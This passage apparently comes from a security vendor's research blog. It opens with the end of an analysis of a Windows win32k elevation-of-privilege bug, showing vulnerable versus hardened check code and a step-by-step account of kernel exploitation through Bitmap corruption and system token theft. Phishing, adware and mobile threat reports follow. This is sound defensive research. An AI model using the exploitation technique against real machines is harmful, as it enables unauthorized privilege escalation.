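    uint32_t cbwndExtra;        /* bytes of class extra data after the struct */
} tagWND;

typedef struct {
    /* Per-class "sizeof(tagWND) + extra" values. Entries that are never
     * filled in stay 0, which is the situation the post describes for
     * FNID_DESKTOP, FNID_SWITCH and FNID_TOOLTIPS before the patch. */
    uint32_t mpFnid_serverCBWndProc[FNID_TABLE_LEN];
} SERVERINFO;

/* Shape of the pre-patch check: returns true when the write is allowed. */
bool vulnerable_index_ok(const SERVERINFO *gpsi, const tagWND *pwnd, int index)
{
    uint32_t entry = gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - FNID_FIRST];
    /* sizeof() is unsigned, so a zero entry makes the right-hand side wrap to
     * almost 2^64 and every non-negative index passes the comparison. */
    if ((size_t)(int)index >= (size_t)entry - sizeof(tagWND))
        return false;
    return true;
}

/* Defensive version: reject unknown classes and uninitialized entries, and
 * require the whole 8-byte write to fit inside the extra data. */
bool hardened_index_ok(const SERVERINFO *gpsi, const tagWND *pwnd, int index)
{
    unsigned fn = pwnd->fnid & 0x3FFF;
    if (fn < FNID_FIRST || fn - FNID_FIRST >= FNID_TABLE_LEN)
        return false;
    uint32_t entry = gpsi->mpFnid_serverCBWndProc[fn - FNID_FIRST];
    if (entry < sizeof(tagWND))
        return false;                       /* never initialized or malformed */
    size_t extra = entry - sizeof(tagWND);
    if (index < 0 || (size_t)index > extra || sizeof(uint64_t) > extra - (size_t)index)
        return false;                       /* write would run past the extra data */
    return true;
}

/* Scenario from the post: the class entry in the table was never initialized.
 * Returns 1 if the selected check accepts the index, 0 if it rejects it. */
int check_uninitialized(bool hardened, int index)
{
    SERVERINFO gpsi = {{0}};
    tagWND wnd = {{0}, FNID_SWITCH_X, 0};
    return (hardened ? hardened_index_ok : vulnerable_index_ok)(&gpsi, &wnd, index);
}

/* Control scenario: a class whose entry is initialized for extra_bytes of extra data. */
int check_initialized(bool hardened, uint32_t extra_bytes, int index)
{
    SERVERINFO gpsi = {{0}};
    gpsi.mpFnid_serverCBWndProc[FNID_SWITCH_X - FNID_FIRST] = (uint32_t)sizeof(tagWND) + extra_bytes;
    tagWND wnd = {{0}, FNID_SWITCH_X, extra_bytes};
    return (hardened ? hardened_index_ok : vulnerable_index_ok)(&gpsi, &wnd, index);
}

int main(void)
{
    printf("uninitialized entry, index 0:  vulnerable=%d hardened=%d\n",
           check_uninitialized(false, 0), check_uninitialized(true, 0));
    printf("0x10 bytes extra, index 0xC:   vulnerable=%d hardened=%d\n",
           check_initialized(false, 0x10, 0xC), check_initialized(true, 0x10, 0xC));
    return 0;
}
```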

Triggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.

```c
gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);
```

It’s important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of xxxSwitchWndProc and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.

```c
LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
  ...
  pti = *(tagTHREADINFO **)&gptiCurrent;
  if ( wnd->fnid != FNID_SWITCH )
  {
    if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )
      return 0i64;
    if ( msg != 1 )
      return xxxDefWindowProc(wnd, msg, wParam, lParam);
    if ( wnd[1].head.h )
      return 0i64;
    wnd->fnid = FNID_SWITCH;
  }
  switch ( msg )
  {
    case WM_CREATE:
      zzzSetCursor(wnd->pcls->spcur, pti, 0i64);
      break;
    case WM_CLOSE:
      xxxSetWindowPos(wnd, 0, 0);
      xxxCancelCoolSwitch();
      break;
    case WM_ERASEBKGND:
    case WM_FULLSCREEN:
      pti->ptl = (_TL *)&pti->ptl;
      ++wnd->head.cLockObj;
      xxxPaintSwitchWindow(wnd, pti, 0i64);
      ThreadUnlock1();
      return 0i64;
  }
  return xxxDefWindowProc(wnd, msg, wParam, lParam);
}
```

The vulnerability in NtUserSetWindowLongPtr can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.

At this stage it’s enough to call NtUserMessageCall again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function xxxPaintSwitchWindow that increments and decrements a couple of integers located by the pointer that we previously set.

sub [rdi+60h], ebx
add [rdi+68h], ebx
...
sub [rdi+5Ch], ecx
add [rdi+64h], ecx

An important condition for triggering the exploitable code path is that the ALT key needs to be pressed.

Exploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable technique: in older versions of the OS there is a special table available at the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common technique that abuses Accelerator Tables (patched in Redstone 2). It involves creating an Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available at the user level, and then freeing the Accelerator Table object and allocating a Bitmap that reuses the same memory address.

The whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and leaks their addresses. The exploit prepares a Switch Window and uses the vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as the Switch Window extra data. Bitmaps are represented by a SURFOBJ structure, and the previously set address needs to be calculated in a way that makes the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure of the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer, and the incremented value allows the function SetBitmapBits() to be used to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.

The pvScan0 field of the SURFOBJ structure is the address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function EnumDeviceDrivers. This function works according to its MSDN description and provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl, and to get the offset to the EPROCESS structure the exploit parses the executable in search of the exported PsInitialSystemProcess variable.

It’s worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post-exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.

Conclusions

It was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn’t allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.

We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation.

May 26, 2020

Spam and phishing in Q1 2020

Quarterly highlights

Don’t get burned

Burning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). Therefore, half-price fake tickets make for excellent bait.

Scammers tried to make their website as close as possible to the original — even the page with the ticket description looked genuine.

There were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were “sold” without prior registration, and the price was a steal ($225 versus $475).

Oscar-winning scammers

February 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.

To promote these sites, Twitter accounts were created — one for each nominated film.

Curious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.

During registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.

Users should be alert to the use of short links in posts on social networks. Scammers often use them because it’s impossible to see where a shortened URL points without actually following it.

There are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.

ID for hire

US companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.

Inspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was “yes” even if the input was gibberish), they were promised compensation “for the leakage of personal data.”

To receive “compensation,” the victim’s citizenship was of no consequence — what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people’s data to claim compensation popped up obsessively on the page.

To receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words “I’am don’t have SSN” (the mistakes are a good indicator of a fake), whereupon they were invited to “rent” an SSN for $9. Interestingly, even if the user already had an SSN, they were still pestered to get another one.

After that, the potential victim was redirected to a payment page with the amount and currency based on the user’s location. For instance, users in Russia were asked to pay in rubles.

The scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.

Disaster and pandemic

Fires in Australia

The natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one “Nigerian prince”-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman’s account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.

Besides the fictional millionaire, other “nature lovers” were keen to help out — their e-mails were more concise, but the scheme was essentially the same.

COVID-19 “Nigerian prince” scheme

COVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purposes. Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.

Bitcoin for coronavirus

Having introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.

In one e-mail, the attackers played on people’s fear of contracting COVID-19: the message was from an unnamed “neighbor” claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer’s parents).

Dangerous advice from the WHO

One fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.

To get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.

In addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained Backdoor.Win32.Androm.tvmf:

There were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:


Corporate segment

The coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and demanded that the attached files be checked immediately.

Another mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic. It then asked for a form to be filled out; otherwise, the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. In actual fact, the attachments contained Trojan-PSW.MSIL.Agensla.a:

We also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim’s corporate mail account were required.

Government compensation

The introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.

One such popular scheme was highlighted by a colleague of ours from Brazil. WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.

Given that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.

Anti-coronavirus protection with home delivery

Due to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.

In Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.

The number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.

On average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.

Statistics: spam

Proportion of spam in mail traffic

Proportion of spam in global mail traffic, Q4 2019 – Q1 2020

In Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.

Proportion of spam in Runet mail traffic, Q4 2019 – Q1 2020

In Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).

Sources of spam by country

Sources of spam by country, Q1 2020

In Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.

Brazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.

Spam e-mail size

Spam e-mail size, Q4 2019 – Q1 2020

Compared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.

Meanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100–200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.

Malicious attachments in e-mail

Number of Mail Anti-Virus triggerings, Q4 2019 – Q1 2020

In Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).

TOP 10 malicious attachments in mail traffic, Q1 2020

In Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.

TOP 10 malicious families in mail traffic, Q1 2020

As regards malware families, the most widespread this quarter was Trojan.Win32.Agentb (12.51%), with Exploit.MSOffice.CVE-2017-11882 (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and Worm.Win32.wbvb (4.65%) in third.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggerings by country, Q1 2020

First place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.

Statistics: phishing

In Q1 2020, the Anti-Phishing system prevented 119,115,577 attempts to redirect users to scam websites. The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.

Attack geography

The country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).

Geography of phishing attacks, Q1 2020

In second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.

Country  %*
Venezuela  20.53%
Brazil  14.95%
Australia  13.71%
Portugal  12.98%
Algeria  12.12%
France  11.71%
Honduras  11.62%
Greece  11.58%
Myanmar  11.54%
Tunisia  11.53%

* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by the Anti-Phishing component of Kaspersky products. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

The largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.

Distribution of organizations affected by phishing attacks by category, Q1 2020

As for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.

Conclusion

Glancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on “standard” fake pages and in spam mailings.

The topic is also used extensively in fraudulent schemes offering compensation and material assistance.

It is highly likely that this type of fraud will become more frequent.

The average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.

Top of this quarter’s list of spam-source countries is Russia, with a share of 20.74%. Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.

May 25, 2020

Aggressive in-app advertising in Android

Recently, we’ve been noticing ever more dubious advertising libraries in popular apps on Google Play. The monetization methods used in such SDKs can pose a threat to users, yet they pull in more revenue for developers than whitelisted ad modules due to the greater number of views. In this post we will look into a few examples of suspicious-looking ad modules that we discovered in popular apps earlier this year.

One of the applications we researched was a popular app that allows users to ask questions anonymously. Integrated into the code of an earlier version of the app was the module com.haskfm.h5mob. Its task was to show intrusive advertising (in breach of the Google Play rules) when the user unlocked the phone.

Code for displaying ads when the screen is unlocked

In other words, the module can show ads whether the app is running or not. The ad can simply pop up on the main screen all on its own, causing a nuisance for the user. We passed our findings to the app developers, who promptly removed com.haskfm.h5mob. However, this module remains interesting from a technical point of view.

To receive advertising offers, the module connects to C&C servers whose addresses are encrypted in the app code.

Decrypting the C&C addresses

The C&C response contains the display parameters and the platforms used to receive ads.

{"status":1,
 "msg":"Success",
 "data":{"rqect":0, "ldfr":1, "tifr":1, "appintset":43200000, "swpa":1, "ssjp":1,
         "tcap":86400000, "ctoftime":3600000,
         "jtslist":[{"domain":"app.appsflyer.com","format":"&android_id={android_id}&advertising_id={gaid}"},
                    {"domain":"app.adjust.com","format":"&android_id={android_id}&gps_adid={gaid}"},
                    {"domain":"app.adjust.io","format":"&android_id={android_id}&gps_adid={gaid}"},
                    ……

The most interesting parameter here is appintset, which specifies the delay before displaying the first ad after installation of the app. In our example, it was set to 43.2 million milliseconds, or 12 hours. This delay makes it much harder for the user to find the culprit for all the ads that suddenly appear on the screen. Also, this technique is frequently used by cybercriminals to trick automatic protection mechanisms, such as sandboxes in app stores. The main parameters are followed by an extensive list of addresses of advertising providers with request parameters for receiving offers.

Earlier we detected a similar ad module in apps without a payload. For example, the code in the app com.android.ggtoolkit_tw_xd, which we detect as not-a-virus:AdWare.AndroidOS.Magic.a, contains the same features and is managed from the same C&C as the com.haskfm.h5mob module. However, this adware app has no graphical interface to speak of, is not displayed in the device’s app menu, and serves only to display intrusive ads as described above (video: adware_in-app_video.mp4).

While, as previously mentioned, the creators of the application described in the first example promptly removed the ad module, not all Android developers are so conscientious. For example, the Cut – CutOut & Photo Background Editor app does not hesitate to treat users to a half-screen ad as soon as the smartphone is unlocked, regardless of whether the app is running or not.

Likewise the Fast Cleaner — Speed Booster & Cleaner app.

In both apps, the library com.vision.lib handles the display of advertising.

Display of advertising

At the time of writing this article, the developers of both apps had not responded to our requests.

Note, however, that adware is not always about greed. Often, app developers are not versed in advertising SDKs and lack the necessary skills to test an integrated advertising library, and therefore may not fully understand what they are adding to their code. The danger for users here is that a dubious library could unexpectedly make its way into an app as part of a rank-and-file update. And it becomes extremely difficult to figure out which of a dozen recently updated apps is the source of intrusive advertising.

IOCs

MD5

1eeda6306a2b12f78902a1bc0b7a7961 – com.android.ggtoolkit_tw_xd
134283b8efedc3d7244ba1b3a52e4a92 – com.xprodev.cutcam
3aba867b8b91c17531e58a9054657e10 – com.powerd.cleaner

C&C

ti.domainforlite[.]com/st/hg
uu.domainforlite[.]com

May 20, 2020

IT threat evolution Q1 2020. Statistics

These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.
  • A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.
  • Ransomware attacks were defeated on the computers of 178,922 unique users.
  • Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 1,152,662 malicious installation packages
    • 42,115 installation packages for mobile banking trojans
    • 4339 installation packages for mobile ransomware trojans

Mobile threats

Quarter events

Q1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals’ exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for €0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authentication codes and use the stolen data without the victim’s knowledge.

Another interesting find this quarter was Cookiethief, a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim’s account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.

The third piece of malware that caught our attention this reporting quarter was Trojan-Dropper.AndroidOS.Shopper.a. It is designed to help cybercriminals leave fake reviews and drive up ratings on Google Play. The attackers’ goals here are obvious: to increase the chances of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over another app: in this case, the official Google Play client.

Mobile threat statistics

In Q1 2020, Kaspersky’s mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.

Number of malicious installation packages detected, Q1 2019 – Q1 2020

Starting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.

Distribution of detected mobile apps by type

Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019

Of all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).

Potentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.

In third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1’s leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and Hqwar (8%) far behind.

It is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.

Top 20 mobile malware programs

Note that these malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware.

      Verdict                                   %*
 1    DangerousObject.Multi.Generic             44.89
 2    Trojan.AndroidOS.Boogr.gsh                 9.09
 3    DangerousObject.AndroidOS.GenericML        7.08
 4    Trojan-Downloader.AndroidOS.Necro.d        4.52
 5    Trojan.AndroidOS.Hiddapp.ch                2.73
 6    Trojan-Downloader.AndroidOS.Helper.a       2.45
 7    Trojan.AndroidOS.Handda.san                2.31
 8    Trojan-Dropper.AndroidOS.Necro.z           2.30
 9    Trojan.AndroidOS.Necro.a                   2.19
10    Trojan-Downloader.AndroidOS.Necro.b        1.94
11    Trojan-Dropper.AndroidOS.Hqwar.gen         1.82
12    Trojan-Dropper.AndroidOS.Helper.l          1.50
13    Exploit.AndroidOS.Lotoor.be                1.46
14    Trojan-Dropper.AndroidOS.Lezok.p           1.46
15    Trojan-Banker.AndroidOS.Rotexy.e           1.43
16    Trojan-Dropper.AndroidOS.Penguin.e         1.42
17    Trojan-SMS.AndroidOS.Prizmes.a             1.39
18    Trojan.AndroidOS.Dvmap.a                   1.24
19    Trojan.AndroidOS.Agent.rt                  1.21
20    Trojan.AndroidOS.Vdloader.a                1.18

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked.

First place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected using cloud technology. It is triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7.08%) respectively. These verdicts are assigned to files that are recognized as malicious by our machine-learning systems.

In fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim’s name.

Trojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan’s payload can be other trojan programs or adware apps.

Sixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals’ server and running it.

The verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.

Trojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.

Geography of mobile threats

Map of infection attempts by mobile malware, Q1 2020

Top 10 countries by share of users attacked by mobile threats

      Country*        %**
 1    Iran            39.56
 2    Algeria         21.44
 3    Bangladesh      18.58
 4    Nigeria         15.58
 5    Lebanon         15.28
 6    Tunisia         14.94
 7    Pakistan        13.99
 8    Kuwait          13.91
 9    Indonesia       13.81
10    Cuba            13.62

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country.

In Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.

Mobile banking trojans

During the reporting period, we detected 42,115 installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.

Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 – Q1 2020

Top 10 mobile banking trojans

      Verdict                                   %*
 1    Trojan-Banker.AndroidOS.Rotexy.e          13.11
 2    Trojan-Banker.AndroidOS.Svpeng.q          10.25
 3    Trojan-Banker.AndroidOS.Asacub.snt         7.64
 4    Trojan-Banker.AndroidOS.Asacub.ce          6.31
 5    Trojan-Banker.AndroidOS.Agent.eq           5.70
 6    Trojan-Banker.AndroidOS.Anubis.san         4.68
 7    Trojan-Banker.AndroidOS.Agent.ep           3.65
 8    Trojan-Banker.AndroidOS.Asacub.a           3.50
 9    Trojan-Banker.AndroidOS.Asacub.ar          3.00
10    Trojan-Banker.AndroidOS.Agent.cf           2.70

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats.

First and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).

Third, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.

Geography of mobile banking threats, Q1 2020

Top 10 countries by share of users attacked by mobile banking trojans

      Country*        %**
 1    Japan           0.57
 2    Spain           0.48
 3    Italy           0.26
 4    Bolivia         0.18
 5    Russia          0.17
 6    Turkey          0.13
 7    Tajikistan      0.13
 8    Brazil          0.11
 9    Cuba            0.11
10    China           0.10

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000).
